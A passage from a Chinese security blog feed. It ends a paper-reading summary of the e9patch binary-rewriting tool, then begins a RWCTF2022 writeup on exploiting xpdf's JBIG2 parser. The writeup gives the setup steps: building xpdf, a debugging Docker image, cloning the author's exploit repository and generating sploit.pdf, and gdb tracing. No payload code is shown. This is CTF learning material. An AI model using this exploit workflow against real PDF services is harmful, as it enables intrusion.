指令，<strong>会依赖 Ins2 中的机器码</strong>（因为 Ins1 jmpq rel32 中的相对偏移量现与 Ins2 的机器码重合）。</p><p>这种依赖关系会阻碍 Ins2 的 patch 过程，因为如果先 patch Ins1 再 patch Ins2 的话，Ins2 的 patch 过程可能会影响到 patch 后的 Ins1。</p><p>因此为了更好的管理多个 patch 的位置，e9patch 使用<strong>反向顺序补丁策略</strong>。其基本思想是：按照<strong>从高到低</strong>的地址顺序来 patch 指令，因为 <strong>指令双关 只能引入与后续指令的依赖关系</strong>。</p><p>e9patch 保存了每个指令机器码的状态，即锁定和未锁定，这可以使用一个 Bitmap 来保存。当某个机器码：</p><ol><li><p><strong>被 e9patch 修改</strong></p></li><li><p><strong>被用于指令双关的一部分机器码</strong></p></li></ol><p>则认为这个机器码是被锁定的。</p><p>T1-T3 的这些策略限制了：</p><ol><li><p>patch 操作将不能<strong>修改</strong>被锁定的机器码（但是仍然可以利用，或者重叠）</p></li><li><p>仅锁定当前 patch 位置后的字节（为了便于管理依赖）</p><blockquote><p>这使得 T3 的短跳 rel8 只能是<strong>正数</strong>，将可跳转的范围（即可被驱逐的指令个数）缩小一半。</p><p>但是实际上这种限制在实验中影响很小。</p></blockquote></li></ol><h3 id="M1-Memory-and-File-Size-Management">M1: Memory and File Size Management</h3><p>最后我们来考虑一下 trampoline 的内存存放位置。在先前的策略中我们可以看到，trampoline 的内存地址受到指令双关中相对偏移量的限制。例如：</p><ul><li><p>T1(b) 的 trampoline addr 为 0x20c08348</p></li><li><p>T3(b) 中的 trampoline addr 为 0x4dfc7b83</p></li></ul><p>这之中相差了非常远的内存距离，会影响 trampoline 的打包，导致高内存碎片和低内存利用率。同时离散的 trampoline 也会大大增加其保存在 ELF 文件中的大小。</p><p><img src="/2022/02/e9patch/image-20220224115717750.png" alt="image-20220224115717750"></p><p>那么很明显有一种方法可以缓解这种低效率的情况：<strong>将多个 trampoline 尽可能地放到同一个虚拟页中</strong>。只是最坏情况下是一个 trampoline 存放至一个内存页中。</p><p>因此 e9patch 还使用了一种机制称为 <code>Physical Page Grouping</code>：</p><blockquote><p>尝试将多个<strong>存放在不同 virtual page 中的 trampoline</strong>，<strong>聚拢并存放到同一个 physical page</strong>。</p></blockquote><p><img src="/2022/02/e9patch/image-20220225110734939.png" alt="image-20220225110734939"></p><p>以上图为例，先前是一个 Physical Page <code>P(a) </code> 对应于一个 Virtual Page <code>V(a)</code>。这种对应关系会占用大量的物理内存。但执行 <code>Physical Page Grouping</code> 后，映射关系是一个 Physical Page <code>P(b)</code> 对应于多个 Virtual Page <code>V(b)</code>，这样可以节省下大量的物理内存。</p><blockquote><p>注：一个跨越 Page 的 trampoline 被视为两个 mini trampoline。</p></blockquote><p>从 <code>V(a)</code> 到 <code>P(b)</code> 的这种 grouping 算法称为分区算法。分区算法的实现有很多种，这里 e9patch 选择的是最简单的<strong>贪心算法</strong>，而且性能较为不错。</p><p>Physical Page Grouping 也有自身的副作用：</p><ol><li>会将那些没有用到的 trampoline 加载进冗余的内存位置。由于这些冗余的 trampoline 并没有被使用，因此不会影响到程序的行为。</li><li>会导致同一物理内存被<strong>多次</strong>映射至虚拟空间中，映射次数可能会超过默认的最大映射次数 <code>vm.max_map_count = 65536</code>。有两种解决方法：<ol><li>使用 sudo 修改默认最大内存映射次数，不太现实。</li><li>控制 e9patch 的<strong>划分精度参数 M</strong>（聚拢 trampoline 所使用的最大物理页面个数），增加所使用的物理页面个数 P(b)，从而降低每个物理内存的映射次数。通常 M &gt;= 64 时，<strong>单个二进制文件</strong>的<strong>物理内存页面映射次数</strong>便会<strong>始终小于默认内存最大映射次数</strong>。</li></ol></li></ol><h2 id="四、实现">四、实现</h2><p>e9patch 的输入：</p><ol><li>未被 patch 的二进制程序</li><li>二进制程序的指令信息，包括位置和指令大小</li><li>待 patch 的指令位置信息集合</li><li>trampoline 集合</li></ol><p>输出：一个使用上述策略的被 patch 程序。重写后的二进制文件相当于原始文件的<strong>插入式替换</strong>，无需额外依赖项。</p><p>实现中有两个点需要注意：</p><ol><li>新的 trampoline 被<strong>添加至 ELF 文件的末尾</strong>，防止移动现有的数据或代码，以避免修改复杂的 ELF header。</li><li>存放 trampoline 的新物理页面<strong>必须在程序加载期间映射到程序的虚拟地址空间</strong>。在具体实现中，e9patch 将一个 mini loader 集成到了输出的二进制文件中，并将入口点替换成 mini loader 的入口点。待将 trampoline 所对应的虚拟页面映射完成后，再将控制流返回到真正的入口点。</li></ol><p>e9patch 同时支持 PIE 和 non-PIE 的二进制文件。而且 <strong>PIE 程序会比 non-PIE 程序更好被 patch</strong>，因为 PIE 的代码通常会被加载到内存地址较高的位置，而 non-PIE 会被加载到内存地址较低的位置，而这与 NULL 更近。</p><p>某些情况会影响到 e9patch 的使用：</p><ul><li><p>L1: 虚拟内存短缺。对于一些具有非常大的代码段或者数据段的程序可能会限制 trampoline 的使用空间，因为 jmpq 的偏移是 32 位的，如果代码段和数据段太大，则可能会无法跳转至堆空间中。</p></li><li><p>L2: patch 单字节指令。e9patch 无法 patch 单字节指令，这会影响到包括 push、pop、ret 在内的指令。</p></li><li><p>L3: patch 超大量的指令 。如果尝试 patch 相当多指令的话，可能会因为机器码依赖关系而降低 patch 覆盖率。</p></li></ul><p>除此之外，e9patch 不能处理那些 inline data 的情况，即 data 包含在 code 之中的情况。</p><p>不过通常情况下 L1并不适用于大部分程序; L2 和 L3 也与许多程序没有什么关系。</p><h2 id="五、评估">五、评估</h2><p>主要从以下几个指标评估：</p><ul><li>patch 时间</li><li>patch 覆盖率</li><li>patch 后的二进制文件大小</li><li>e9patch 实现原型的 scalability</li></ul><p>e9patch 可应用与二进制加固、插桩和修复等等。patch 程序时， e9patch 主要为以下两种指令进行 patch：</p><ol><li><p>所有 jmp/jcc 跳转指令</p><p>粗略模拟覆盖率插桩，因为 e9patch 在设计上没有基本块的信息，因此只是粗略的 patch 掉每个 jmp 指令。</p></li><li><p>所有可能会写入堆指针的指令</p><p>这里模拟的是二进制加固情况下，patch 掉写入堆指针相关的指令。</p></li></ol><p>所有被 patch 的指令，都替换成一个除了执行原始指令以外的空 trampoline。以下是评估的结果：</p><blockquote><p>#Loc: 总被 patch 的个数</p><p>Base%: B1+B2 策略</p><p>Succ%：总 patch 覆盖率</p></blockquote><p><img src="/2022/02/e9patch/image-20220225171251837.png" alt="image-20220225171251837"></p><p>从上图可以看到：</p><ul><li><p>e9patch 的覆盖率相当的高，基本可以接近 100%。</p></li><li><p>在 baseline 覆盖率不高的情况下，T1-T3 策略可以将覆盖率极大的往高处升。</p><p>这里尤其需要强调一下 T3 策略。T3 策略本身可 patch 的覆盖率就比较大，可以 patch 那些其他策略无法 patch 的指令。</p></li><li><p>PIE 程序中任何一种 patch 策略都会比 non-PIE 程序中所对应的 patch 覆盖率要高很多。</p></li><li><p>gamess 和 zeusmp 之所以覆盖率没有到 100% 是因为这两个程序都分配了相当大的 .bss 段（正对应于 L1）。当这两个程序使用 PIE 模式进行编译时可以达到 100% 的覆盖率。</p></li><li><p>在使用 physical page grouping 策略后，文件大小分别涨幅 +57% / +30% ，还算可以接受。</p><p>在不使用该策略的情况下，大小涨幅分别是 +2239.83% / +568.96%，这就实在没法接受了。</p></li></ul><p>之后是 <strong>scalability 的测试</strong>，这里是使用大型程序 chrome 和 firefox 的测试结果：</p><blockquote><p>firefox 将大部分代码放置在 <a href="http://libxul.so">libxul.so</a> 中。</p></blockquote><p><img src="/2022/02/e9patch/image-20220225212346125.png" alt="image-20220225212346125"></p><p>测试时选择的测试集要求<strong>尽可能减小执行 JIT - JS 的代码执行时间</strong>。因为 e9patch 没法对 JIT 代码打 patch。</p><p>可以看到，chrome 引入了 ~+113% 的 overhead，firefox 引入了~+46% 的 overhead。firefox overhead 较低的一种可能原因是 firefox 花更多时间执行 JIT 代码，或者执行未被插桩的 shared object。</p><p>通过上面的内容可以看到， e9patch 可以很轻松的将 patch 规模扩展至上百兆文件大小的二进制程序。</p><p>最后是 e9patch 应用在二进制加固下的表现，这里先介绍一下测试用的二进制加固技术—— LowFat Pointer。其基本思想为：将程序虚拟内存空间分割为多个 large region，其中每个 region 负责分配一个给定的固定大小范围的对象：</p><p><img src="/2022/02/e9patch/layout.png" alt="LowFat memory layout"></p><ul><li><p>第一个 Region 像往常一样包含程序文本、数据、bss等段。</p></li><li><p>后面的区域用于 LowFat 指针分配。例如，</p><ul><li><p>Region #1用于大小为 1-16 字节的分配</p></li><li><p>Region #2 用于大小为 17-32 字节的分配</p></li><li><p>等等</p></li></ul><p>此外，所有 LowFat 分配的对象<strong>都与分配大小边界对齐</strong>。这样一来，每一个 LowFat 指针的值都可以用于获取该对象的内存边界。</p></li></ul><p>举个简单的例子：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">p = <span class="built_in">malloc</span>(<span class="number">10</span>); <span class="comment">// p = 0x8997f2820</span></span><br></pre></td></tr></table></figure><p>由于指针 p 的值位于 <code>0x800000000~0x1000000000</code> 中，因此可以得知 p 所指向的内存大小为 16 字节（注意内存对齐）。</p><p>对于内存访问 <code>q = 0x8997f2825</code>，由于：</p><ol><li>q 位于 <code>0x800000000~0x1000000000</code> 范围，因此 object size 大小为 16 字节</li><li>由于 q <strong>向下与 object size 对齐</strong>得到地址 0x8997f2820，这样便可得知 object 基地址</li></ol><p>接下来对以下函数插桩：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">char</span> <span class="title">get</span><span class="params">(<span class="type">char</span> *q, <span class="type">int</span> i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> q[i];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>得到该函数以检测 OOB：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">char</span> <span class="title">get</span><span class="params">(<span class="type">char</span> *q, <span class="type">int</span> i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">char</span> *q_base = <span class="built_in">base</span>(q);</span><br><span class="line">    <span class="type">size_t</span> q_size = <span class="built_in">size</span>(q);</span><br><span class="line">    <span class="type">char</span> *r = q + i;</span><br><span class="line">    <span class="keyword">if</span> (r &lt; q_base || r &gt;= q_base + q_size)</span><br><span class="line">        <span class="built_in">report_oob_error</span>();</span><br><span class="line">    <span class="keyword">return</span> *r;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>而下图便是 e9patch 应用 LowFat 变体的实验结果：</p><p><img src="/2022/02/e9patch/image-20220225215921164.png" alt="image-20220225215921164"></p><p>而 lowfat 项目本身只能用在 C/C++ 语言中，而 e9patch 可以应用至任何语言的二进制文件中，因此 e9patch 相当的强大。</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、概述&quot;&gt;一、概述&lt;/h2&gt;
&lt;p&gt;二进制重写技术在很多场景下都有大用，例如修复、加固、插桩、打补丁、调试等等。而大部分二进制重写技术都依赖于从输入二进制中&lt;strong&gt;恢复控制流信息&lt;/strong&gt;，这是因为这些二进制重写技术通常都涉及指令移动等等，这就必须调整其他跳转指令的相对跳转偏移，即修复&lt;strong&gt;跳转目标集&lt;/strong&gt;。&lt;/p&gt;
&lt;p&gt;但问题在于，&lt;strong&gt;从二进制文件中恢复控制流信息是相当困难的&lt;/strong&gt;：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;一种方法是&lt;strong&gt;依赖于特定的二进制元数据&lt;/strong&gt;，例如调试符号来恢复重定位信息，但并非所有二进制都会包含这类元数据（strip）&lt;/li&gt;
&lt;li&gt;另一种方法是&lt;strong&gt;使用静态二进制分析技术&lt;/strong&gt;来恢复，但通常效果不佳，而且不能应用于大小较大的二进制文件。&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;因此大部分二进制重写技术都依赖于一组甚至多组假设，例如特定编译器、特定编程语言等等。这样一来这些二进制重写技术都存在着局限性，难以扩展，同时也没办法处理大型程序，比如 chrome。&lt;/p&gt;
&lt;p&gt;这篇论文向我们展示了一种基于 &lt;strong&gt;x86_64&lt;/strong&gt; 的二进制重写技术，称为 e9patch。其中，&lt;code&gt;e9&lt;/code&gt; 表示的是 &lt;code&gt;jmpq rel32&lt;/code&gt; 的 opcode：0xe9。这种二进制重写技术的优点在于&lt;strong&gt;控制流无关&lt;/strong&gt;（&lt;strong&gt;control flow agnostic&lt;/strong&gt;），即&lt;strong&gt;无需任何控制流信息的知识&lt;/strong&gt;。其二进制重写方法保留了跳转目标集，无需控制流恢复。因此， 这个工具相当的鲁棒，而且还可以 patch 诸如 chrome 等等大小大于 100MB 的二进制程序。&lt;/p&gt;
&lt;p&gt;除了普通的二进制程序以外，e9patch 还可以为 shared objects 或 libraries 打补丁。&lt;/p&gt;</summary>
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="binary rewriting" scheme="https://kiprey.github.io/tags/binary-rewriting/"/>
    
  </entry>
  
  <entry>
    <title>RWCTF2022 Pwn 笔记3 - hso groupie Writeup</title>
    <link href="https://kiprey.github.io/2022/02/rwctf2022_hso/"/>
    <id>https://kiprey.github.io/2022/02/rwctf2022_hso/</id>
    <published>2022-02-01T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.094Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><p>这里是复盘 RWCTF2022 中 <code>hso groupie</code> 题时所写下的一些笔记，考点来源于 Project Zero 的 <strong>A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution</strong> 一文。</p><p>整体的做题思路主要由 Riatre 师傅的 exploit 中所推导出，换句话说，这里的笔记主要是对 <a href="https://github.com/Riatre/hso-groupie/tree/master/exploit">作者 exploit</a> 的解释说明。</p><p>由于这题同样也较为复杂，因此需要单独开一个博文来记录。</p><blockquote><p>联合作者：sakura</p></blockquote><!-- more ---><h2 id="一、小叙">一、小叙</h2><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Help check how secure our latest PaaS (Pdftohtml-as-a-Service) is!</span><br><span class="line">Pick your favorite bug from this bloody list, or really, just exploit that bug so your exploit would also work on latest Poppler [1] and maybe even KItinerary.</span><br><span class="line">The container image is also available on Docker Hub.</span><br><span class="line">[1] Yeah, turns out propagating bug fixes between different Clone-and-Own codebases takes time :)</span><br><span class="line">socat -t90 stdio tcp-connect:47.242.147.191:31337</span><br><span class="line">attachment</span><br><span class="line"></span><br><span class="line">Clone-and-Pwn, difficulty:hard</span><br></pre></td></tr></table></figure><p>这题是 clone-and-pwn，源码没有做任何改变，就是通过查看最近提交的漏洞修复记录来发掘并利用漏洞。</p><h2 id="二、环境搭建">二、环境搭建</h2><h3 id="1-本地环境搭建">1. 本地环境搭建</h3><blockquote><p>这一题是在 debian 下编译的，因此对于 debian 系统来说，有些系统可以直接跑 exp（例如我的 XD）。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">wget https://dl.xpdfreader.com/xpdf-4.03.tar.gz</span><br><span class="line">tar -zxvf xpdf-4.03.tar.gz</span><br><span class="line"><span class="built_in">cd</span> xpdf-4.03</span><br><span class="line"><span class="built_in">mkdir</span> build</span><br><span class="line"><span class="built_in">cd</span> build</span><br><span class="line">cmake -DCMAKE_BUILD_TYPE=Debug -DCMAKE_CXX_FLAGS=<span class="string">&quot;-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro -g3 -ggdb3 -O0&quot;</span> ..</span><br><span class="line">make -j `<span class="built_in">nproc</span>` </span><br><span class="line"></span><br><span class="line"><span class="comment"># 题目还给了一个 `GNU C Library (Debian GLIBC 2.33-2) release` 的 glibc 附件</span></span><br><span class="line">patchelf --replace-needed libc.so.6 <span class="variable">$&#123;PWD&#125;</span>/../../libc.so.6 ./xpdf/pdftohtml</span><br></pre></td></tr></table></figure><p>启动方式：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xpdf/pdftohtml &lt;pdf-path&gt; --</span><br></pre></td></tr></table></figure><h3 id="2-exploit-调试环境搭建">2. exploit 调试环境搭建</h3><p>去 <a href="https://github.com/Riatre/hso-groupie/tree/master/chall">题目环境</a> 这里下载 dockerfile 等题目环境，之后给 dockerfile 打 patch：</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--- a/Dockerfile</span></span><br><span class="line"><span class="comment">+++ b/Dockerfile</span></span><br><span class="line"><span class="meta">@@ -8,7 +8,7 @@</span> RUN cd /tmp/xpdf-4.03 &amp;&amp; \</span><br><span class="line">     mkdir build &amp;&amp; \</span><br><span class="line">     cd build &amp;&amp; \</span><br><span class="line">     cmake -DCMAKE_BUILD_TYPE=Release \</span><br><span class="line"><span class="deletion">-        -DCMAKE_CXX_FLAGS=&quot;-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro&quot; .. &amp;&amp; \</span></span><br><span class="line"><span class="addition">+        -DCMAKE_CXX_FLAGS=&quot;-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro -g3 -ggdb3 -O0 &quot; .. &amp;&amp; \</span></span><br><span class="line">     make -j$(nproc)</span><br><span class="line"></span><br><span class="line"> FROM debian:unstable-20211220-slim</span><br><span class="line"><span class="meta">@@ -20,6 +20,7 @@</span> RUN echo &quot;deb [check-valid-until=no] http://snapshot.debian.org/archive/debian/2</span><br><span class="line">     apt-get install -y fonts-arkpandora fonts-noto fonts-dejavu fonts-font-awesome fonts-lato fonts-powerline gsfonts &amp;&amp; \</span><br><span class="line">     apt-get clean &amp;&amp; rm -rf /var/lib/apt/lists/*</span><br><span class="line"> COPY --from=build /tmp/xpdf-4.03/build/xpdf/pdftohtml /usr/local/bin/</span><br><span class="line"><span class="addition">+COPY gdbserver /usr/bin/gdbserver</span></span><br><span class="line"> RUN mkdir -p /run/secrets &amp;&amp; echo &#x27;rwctf&#123;flag placeholder&#125;&#x27; &gt; /run/secrets/flag</span><br><span class="line"></span><br><span class="line"><span class="deletion">-ENTRYPOINT [ &quot;/bin/sh&quot;, &quot;-c&quot;, &quot;/usr/local/bin/pdftohtml \&quot;$@\&quot;&quot;, &quot;--&quot; ]</span></span><br><span class="line">\ No newline at end of file</span><br><span class="line"><span class="addition">+ENTRYPOINT [ &quot;/bin/sh&quot;]</span></span><br><span class="line">\ No newline at end of file</span><br></pre></td></tr></table></figure><p>修改目的主要是把 gdbserver 放进镜像里，以及让入口点停在 <code>/bin/sh</code>，而不直接启动 pdftohtml。</p><blockquote><p>这里要注意 COPY 命令的源路径，这里是直接使用相对路径。</p></blockquote><p>执行 <code>build.sh</code>，执行完成后可以检查一下镜像</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  chall git:(master) docker image ls         </span><br><span class="line">REPOSITORY             TAG                      IMAGE ID       CREATED             SIZE</span><br><span class="line">hsogroupie/pdftohtml   latest                   042e72a0f133   45 minutes ago      946MB</span><br></pre></td></tr></table></figure><p>启动 docker 镜像</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -itd -p 1234:1234 -v sakura_volume:/tmp/chall --cap-add=SYS_PTRACE --security-opt seccomp=unconfined --name hsogroupie hsogroupie/pdftohtml</span><br></pre></td></tr></table></figure><p>该命令非常长，解构如下：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">docker run --help</span><br><span class="line"></span><br><span class="line">-i : 进入交互模式</span><br><span class="line">-t : 分配一个伪shell</span><br><span class="line">-d : 在后台以守护模式运行容器</span><br><span class="line">-p : 宿主机端口:容器端口，将容器端口映射到宿主机端口，这里都指定1234就好了</span><br><span class="line">-v : 挂载数据卷</span><br><span class="line">--cap-add=SYS_PTRACE --security-opt seccomp=unconfined : Docker默认禁用PTRACE功能，需要指定这个命令</span><br><span class="line">--name : 给容器声明一个名字</span><br></pre></td></tr></table></figure><p>这里挂载数据卷需要额外说明（参考<a href="https://www.cnblogs.com/edisonchou/p/docker_volumes_introduction.html">这篇文章</a>）</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">docker volume create sakura_volume // 创建一个自定义容器卷</span><br><span class="line">docker volume ls // 查看所有容器卷</span><br><span class="line">docker volume inspect sakura_volume // 查看指定容器卷详情信息</span><br><span class="line">...</span><br><span class="line">[</span><br><span class="line">    &#123;</span><br><span class="line">        &quot;CreatedAt&quot;: &quot;2022-02-02T01:29:55+08:00&quot;,</span><br><span class="line">        &quot;Driver&quot;: &quot;local&quot;,</span><br><span class="line">        &quot;Labels&quot;: &#123;&#125;,</span><br><span class="line">        &quot;Mountpoint&quot;: &quot;/var/lib/docker/volumes/sakura_volume/_data&quot;,</span><br><span class="line">        &quot;Name&quot;: &quot;sakura_volume&quot;,</span><br><span class="line">        &quot;Options&quot;: &#123;&#125;,</span><br><span class="line">        &quot;Scope&quot;: &quot;local&quot;</span><br><span class="line">    &#125;</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>然后我们对 <code>/var/lib/docker/volumes/sakura_volume/_data</code> 的修改就会映射到容器的 <code>/tmp/chall</code> 里，传输文件就比较方便。</p><p>启动完了之后我们可以 <code>docker ps</code> 一下看看有没有问题</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  chall git:(master) docker ps -a                     </span><br><span class="line">CONTAINER ID   IMAGE                  COMMAND     CREATED          STATUS          PORTS                                       NAMES</span><br><span class="line">15f265c337c0   hsogroupie/pdftohtml   &quot;/bin/sh&quot;   34 minutes ago   Up 34 minutes   0.0.0.0:1234-&gt;1234/tcp, :::1234-&gt;1234/tcp   hsogroupie</span><br></pre></td></tr></table></figure><p>生成 exp pdf，注意要对 submodule 初始化，不然没有 jbig2enc 库</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/Riatre/hso-groupie.git</span><br><span class="line">cd hso-groupie/exploit</span><br><span class="line">git submodule update --init</span><br><span class="line">cd ..</span><br><span class="line">sudo cp -r exploit /var/lib/docker/volumes/sakura_volume/_data</span><br></pre></td></tr></table></figure><p>然后我们进入 docker 容器里对应数据卷的 exploit 目录下，应该要 install 这些安装包，要是少了就自己补一下：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">apt-get update</span><br><span class="line">apt-get install make g++ python3 pybind11-dev python3-dev python2 python2-dev</span><br><span class="line">make</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line">root@15f265c337c0:/tmp/chall/exploit# make</span><br><span class="line">g++ -O3 -std=c++20 -shared -fPIC jbig2arith.cc jbig2arith.h jbjbarith.cc jbjbarith.h -ojbjbarith.cpython-39-x86_64-linux-gnu.so -I/usr/include/python3.9 -I/usr/include/python3.9</span><br><span class="line">python3 sploit.py</span><br><span class="line">python2 pdf.py sploit &gt; sploit.pdf</span><br></pre></td></tr></table></figure><p>调试 exp</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker exec -it 15f265c337c0 bash</span><br></pre></td></tr></table></figure><p>进入容器的 bash 环境，然后启动 gdbserver</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rm -rf output &amp;&amp; /usr/bin/gdbserver :1234 /usr/local/bin/pdftohtml /tmp/chall/exploit/sploit.pdf output</span><br></pre></td></tr></table></figure><p>这里的 output 是随便给一个文件夹名就行了，这是 pdftohtml 必须的启动参数，它会创建这个文件夹，并输出一个结果到这个文件夹里，并且它不能是已经存在的文件夹，而 sploit.pdf 就是我们生成出来的 exp pdf 文件。</p><p>然后在宿主机也启动 gdb，然后 <code>target remote:1234</code>，然后随便下个断点看看效果，注意因为 docker 里的源码路径和我宿主机的源码路径并不一致，所以要用 <code>substitute-path</code> 做个转换，建议写个 gdb 脚本完成这个事情，后面就不用一直自己敲了。</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">target remote :1234</span><br><span class="line">set substitute-path  /tmp/xpdf-4.03/xpdf /home/sakura/ctf/hso-groupie/chall/xpdf-4.03/xpdf</span><br><span class="line">b findSegment</span><br><span class="line">c</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line"> ► 0x555555675179    mov    r8, qword ptr [rax]</span><br><span class="line">   0x55555567517c    cmp    dword ptr [r8 + 8], esi</span><br><span class="line">   0x555555675180    jne    0x555555675170                &lt;0x555555675170&gt;</span><br><span class="line">    ↓</span><br><span class="line">   0x555555675170    add    rax, 8</span><br><span class="line">   0x555555675174    cmp    rax, rdx</span><br><span class="line">   0x555555675177    je     0x555555675190                &lt;0x555555675190&gt;</span><br><span class="line">───────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────</span><br><span class="line">In file: /home/sakura/ctf/hso-groupie/chall/xpdf-4.03/xpdf/JBIG2Stream.cc</span><br><span class="line">   4036 JBIG2Segment *JBIG2Stream::findSegment(Guint segNum) &#123;</span><br><span class="line">   4037   JBIG2Segment *seg;</span><br><span class="line">   4038   int i;</span><br><span class="line">   4039 </span><br><span class="line">   4040   for (i = 0; i &lt; globalSegments-&gt;getLength(); ++i) &#123;</span><br><span class="line"> ► 4041     seg = (JBIG2Segment *)globalSegments-&gt;get(i);</span><br><span class="line">   4042     if (seg-&gt;getSegNum() == segNum) &#123;</span><br><span class="line">   4043       return seg;</span><br><span class="line">   4044     &#125;</span><br><span class="line">   4045   &#125;</span><br><span class="line">   4046   for (i = 0; i &lt; segments-&gt;getLength(); ++i) &#123;</span><br><span class="line">───────────────────────────────────────────[ STACK ]────────────────────────────────────────────</span><br><span class="line">00:0000│ rsp 0x7fffffffdd28 —▸ 0x555555676c72 ◂— mov    r12, rax</span><br><span class="line">01:0008│     0x7fffffffdd30 ◂— 0x0</span><br><span class="line">02:0010│     0x7fffffffdd38 ◂— 0x0</span><br><span class="line">03:0018│     0x7fffffffdd40 —▸ 0x555561ec0f00 ◂— 0x200000001</span><br><span class="line">04:0020│     0x7fffffffdd48 —▸ 0x555561f40c64 ◂— 0x203a100000000</span><br><span class="line">05:0028│     0x7fffffffdd50 ◂— 0x0</span><br><span class="line">... ↓        2 